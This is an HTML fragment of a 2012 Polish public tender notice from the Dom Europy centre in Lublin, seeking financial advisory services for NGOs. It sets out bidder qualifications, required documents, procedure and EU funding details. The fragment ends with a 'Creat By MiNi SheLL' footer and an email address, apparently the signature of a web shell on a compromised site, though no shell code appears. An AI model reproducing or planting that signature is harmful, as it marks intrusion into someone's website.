a. Wyksztalcenie wyższe ekonomiczne lub ukończone studia podyplomowe z zakresu finansów lub rachunkowości.
b.Doświadczenie w pracy na stanowisku obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych oraz posiadania wiedzy z zakresu pozyskiwania środków zewnętrznych na rzecz organizacji pozarządowych, w celu wykazania doświadczenia ww osoba powinna wykazać spełnienie łącznie  poniższych kryteriów tj.
-ukończenie co najmniej jednego szkolenia z tematyki obejmującej sprawozdawczość, rozliczenie projektów, prawidłowe rozliczanie projektu wewnątrz organizacji
-przedłożenie dokumentu  poświadczającego wykonywanie pracy lub zlecenia na stanowisku  obejmującym obowiązki prowadzenia finansów lub księgowości dla organizacji pozarządowych. 
c.w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie zrealizował co najmniej 1 usługę polegającą na doradztwie finansowym oraz załączeniem dokumentów potwierdzających, że usługi wskazane w wykazie zostały wykonane należycie (np. referencje, umowa o doradztwo finansowe)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie 1
Zamawiający nie określa szczegółowego sposobu oceny spełnienia tego warunku.
Zadanie 2
Wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia 
Zadanie 3
Wykazać, iż jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> cop@lubelskie.pl, domeuropy@lubelskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Europejskie Centrum Integracji i Współpracy Samorządowej Dom Europy ul. Marii Curie-Skłodowskiej 5, pok. 8 20-029 Lublin..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.02.2012 godzina 10:00, miejsce: Europejskie Centrum Integracji i Współpracy Samorządowej Dom Europy ul. Marii Curie-Skłodowskiej 5, pok. 8 20-029 Lublin..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt pt. Centrum Organizacji Pozarządowych Domu Europy jest realizowany w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet V Dobre rządzenie, Działanie 5.4 Rozwój potencjału trzeciego sektora, Poddziałanie 5.4.2 Rozwój dialogu obywatelskiego, współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com